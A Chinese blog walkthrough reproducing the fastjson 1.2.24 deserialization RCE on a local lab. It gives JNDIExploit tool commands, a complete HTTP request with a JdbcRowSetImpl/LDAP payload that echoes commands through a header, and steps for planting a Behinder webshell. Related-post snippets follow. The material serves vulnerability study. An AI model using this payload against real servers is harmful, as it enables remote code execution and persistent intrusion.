fastjson 1.2.24 反序列化 RCE 漏洞复现

于 2024-06-27 23:24:46 发布
阅读量324 收藏 7
点赞数 5
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_63299551/article/details/140020879
版权

1.环境搭建

这里直接在本地搭建了一个环境并没有采用docker部署的形式,有需要的可以在后台私信我获取

搭建好运行主程序即可 manven有问题的话可以看看上篇写的文章

 该图为搭建好的页面

2.漏洞描述

2.1什么是fastjson

具体可以参考这篇文章

FastJson的介绍与使用(一)_maven fastjson-CSDN博客

fastjson最主要的功能就是可以将Java对象和json之间来回转化,而这个漏洞出现的原因就是在反序列化的过程中

2.2fastjson反序列化漏洞原理

fastjson在序列化的过程中使用了Auto Type功能,这个功能在序列化的时候会带有一个@type来指示字符的原始类型,在反序列化的时候会读取@type。这个时候就可以在反序列化的时候构造一个恶意的payload进行攻击

3.漏洞复现

首先用bp抓包 发送到repeater模块中 将get请求方式改为post 将 x-www-form-urlencoded改为 json

接着使用 JNDIExploit-1.4-SNAPSHOT.jar工具进行攻击 需要的可以后台私聊我

启动命令为

java -jar JNDIExploit-1.4-SNAPSHOT.jar -i 127.0.0.1  //启动命令

java -jar JNDIExploit-1.4-SNAPSHOT.jar -i 127.0.0.1 -u //查看payload

首先使用 java -jar JNDIExploit-1.4-SNAPSHOT.jar -i 127.0.0.1 -u 查看需要用到的payload为

 接着启动该工具

java -jar JNDIExploit-1.4-SNAPSHOT.jar -i 127.0.0.1

bp数据包如下图所示

POST / HTTP/1.1
Host: 127.0.0.1:8081
cmd: whoami
Cache-Control: max-age=0
sec-ch-ua: "Not-A.Brand";v="99", "Chromium";v="124"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.118 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/json
Content-Length: 204


{"a": {"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b": {"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://127.0.0.1:1389/TomcatBypass/TomcatEcho","autoCommit":true}}
 ldap://127.0.0.1:1389/TomcatBypass/TomcatEcho //该命令用于在中间件为Tomcat时命令执行结果的回显,通过添加header cmd:whoami的方式传递想要执行的命令

到这一步漏洞已经利用成功了 接下来可以打入冰蝎马进行getshell

4.Getshell

payload如下图所示

 bp数据包如下

 用浏览器访问 http://127.0.0.1:8081/ateam 出现以下页面说明打入成功

接着用冰蝎连接

 

_m0NESY
关注
  • 5
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
FastJson1.2.24/47 Rce
weixin_44687621的博客
04-22 445
之前只在本地测试过FastJson漏洞,实战情况下一般需要利用VPS弹shell,这里尝试一下 环境 https://buuoj.cn/challenges#[FastJson]1.2.24-rce 构建rmi服务器工具marshalsec https://github.com/RandomRobbieBF/marshalsec-jar.git FastJson1.2.24 首先编写恶意类 import java.lang.Runtime; public class Exploit{ publ
fastjson 序列RCE,远程命令执行漏洞CVE、CNVD(2022年12月最新)
qq1140037586的博客
12-18 2196
漏洞利用fastjson autotype在处理json对象的时候,未对@type字段进行完全的安全性验证,攻击者可以传入危险类,并调用危险类连接远程rmi主机,通过其中的恶意类执行代码。攻击者通过这种方式可以实远程代码执行漏洞的利用,获取服务器的敏感信息泄露,甚至可以利用此漏洞进一步对服务器数据进行修改,增加,删除等操作,对服务器造成巨大影响。
探秘Java安全漏洞fastjson-RCE PoC工具包
gitblog_00074的博客
06-19 395
探秘Java安全漏洞fastjson-RCE PoC工具包 项目地址:https://gitcode.com/Lonely-night/fastjson_gadgets_scanner 在这个数字的时代,软件安全至关重要,尤其是当我们谈论企业级应用时。开源社区一直是推动技术创新的重要力量,今天我们将深入探讨一个独特的开源项目——decomplie_jar和fastjson,这是一个专门针对Ja...
Java - FastjsonRCE攻击模拟(远程代码执行漏洞
Zong_0915的博客
12-03 1490
Java - FastjsonRCE问题分析及攻击模拟(远程代码执行漏洞FastjsonRCE问题的必要前提分析 首先,本文的Fastjson相关的RCE问题,针对于版本在1.2.24以下的。 FastjsonRCE问题的必要前提分析
网络安全深入学习第七课——热门框架漏洞RCEFastjson序列漏洞
p36273的博客
09-18 1673
json全称是JavaScript object notation。即JavaScript对象标记法,使用键值对进行信息的存储。"age":23,json本质就是一种字符串,用于信息的存储和交换。------ Fastjson 是一个阿里巴巴公司开源的 Java 语言编写的高性能功能完善的 JSON 库。可以将Java 对象转换为 JSON 格式(序列),当然它也可以将 JSON 字符串转换为 Java 对象(序列)。
FastjsonRCE1.2.47】漏洞
02-24 1257
Fastjson漏洞原理和RCE1.2.47漏洞
fastjson1.2.24序列RCE
最新发布
06-24
然而,像许多处理序列序列的库一样,Fastjson在某些版本中存在安全风险,其中之一便是“Fastjson 1.2.24序列RCE漏洞。这个漏洞允许攻击者通过精心构造的JSON输入,在目标系统上执行任意代码,从而可能...
springmvc fastjson 序列时间格式方法(推荐)
10-20
在Spring MVC中,Fastjson是一个常用的JSON库,用于序列序列Java对象。当我们在处理日期时间字段时,可能会遇到序列时日期格式不一致的问题,导致默认显示为时间戳。本文将详细介绍两种解决Spring MVC中...
SpringBoot Redis配置Fastjson进行序列序列
10-16
本篇将详细介绍如何在Spring Boot中配置Fastjson进行序列序列,以实与Redis的高效交互。 Fastjson是阿里巴巴开发的一款高性能的JSON处理库,它提供了快速的序列序列能力,支持多种Java类型,包括...
FastJson序列
06-17
[{"listA":[{"id":"fds","name":"张三"},{"id":"fds","name":"李四"}],"test":"432"}, {"listA":[{"id":"fds","name":"张三"},{"id":"fds","name":"李四"}],...数组里面封装数组的序列方法,通过两个bean,进行封装
Fastjson扫描测试工具.rar
09-08
在渗透测试中遇到json数据一般都会测试下有没有序列,然而JSON库有Fastjson,JackJson,Gson等等,那么怎么判断后端不是Fastjson呢?可以构造特定的payload来进行探测分析
技术分享 | Fastjson-RCE漏洞
Jeeseen123的博客
05-26 475
Fastjson提供autotype功能,允许用户在序列数据中通过 @type 指定序列的类型,其次Fastjson自定义的序列会调用指定类中的setter方法和部分getter方法。 当组件开启autotype并且序列不可信的数据时,攻击者构造的数据(恶意代码)会进入特定类的setter或getter方法中,可能会被恶意利用。 影响版本 Fastjson1.2.47以及之前的版本 1.1 环境准备 攻击机1 用于接受弹shell 系统:Win10 x64 安装nc,burpsuit
Fastjson RCE漏洞利用与防护手段
不忘初心,护天下安全!
07-12 696
Fastjson是Alibaba开发的Java语言编写的高性能JSON库,用于将数据在JSON和Java Object之间互相转换,提供两个主要接口JSON.toJSONString和JSON.parseObject/JSON.parse来分别实序列序列操作。项目地址:https://link.zhihu.com/?target=https%3A//github.com/alibaba/fastjson随着该框架的使用,安全人员发了一系列序列漏洞,每一次都是IT界的“地震”。漏洞合集见:Fa
Fastjson RCE漏洞和理解
Delphinidae
03-28 2365
漏洞fastjson 远程代码执行漏洞 漏洞原因:fastjson在执行序列时加载数据被注入,注入的数据被解析执行导致任意命令执行。 漏洞历史:fastjson的版本已经到了1.2.73了,但是历史上高危漏洞频繁出。 如:1.2.24 出的序列漏洞,经过对类的黑名单限制和autotype的关闭、checkautotype等,还是还被绕过限制,如:1.2.47,1.2.68 的漏洞,都是绕过限制加载恶意的类并造成远程代码执行的高危漏洞漏洞版本是1.2.47。 漏洞github上
漏洞-fastjson1.2.24-RCE
jazzz98的博客
06-27 397
(4)安装完成好后,新建一个java脚本,命名为TouchFile.java,这个文件的作用大致就是使用java创建一个文件,如下为其所有代码,本意为在靶场的tmp目录下创建一个名为。还有一个比较重要的问题就是,攻击思路为:使用Ubuntu的java加载一个调用恶意文件的环境,再使用该环境远程加载一个恶意类,达到借刀进行命令执行的效果。(3)由于我的环境已经安装好恶意调用java的RMI服务,因此这里仅提供以下编译环境的命令,编译成功会出绿色的"
Fastjson序列漏洞——fastjson RCE漏洞的源头(1.2.24-rce)
m0_71263989的博客
02-20 1006
FastJson是alibaba的一款开源JSON解析库,可用于将Java对象转换为其JSON表示形式,也可以用于将JSON字符串转换为等效的Java对象。近几年来fastjson漏洞层出不穷,本文将谈谈近几年来fastjson RCE漏洞的源头:17年fastjson爆出的1.2.24序列漏洞。以这个漏洞为基础,详细分析fastjson漏洞的一些细节问题。
Fastjson 1.2.47 RCE漏洞
wutiangui的博客
11-07 340
Fastjson提供了autotype功能,允许用户在序列数据中通过“@type”指定序列的类型,Fastjson自定义的序列机制时会调用指定类中的setter方法及部分getter方法,那么当组件开启了autotype功能并且序列不可信数据时,攻击者可以构造数据,使目标应用的代码执行流程进入特定类的特定setter或者getter方法中,若指定类的指定方法中有可被恶意利用的逻辑(也就是通常所指的“Gadget”),则会造成一些严重的安全问题。修改用户信息发有回显。2.开启http服务。
Fastjson_1.2.24_unserialize_rce漏洞
qq_45953122的博客
09-11 604
关于FastJson1.2.24序列漏洞,简单来说,就是FastJson通过parseObject/parse将传入的字符串序列为Java对象时由于没有进行合理检查而导致的。
fastjson 1.2.24 序列导致任意命令执行漏洞
03-16
fastjson 1.2.24 存在序列漏洞,攻击者可以利用该漏洞执行任意命令。该漏洞的原因是 fastjson序列时未对恶意数据进行足够的校验,导致攻击者可以构造恶意数据,使其被 fastjson 解析时执行任意命令。建议...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值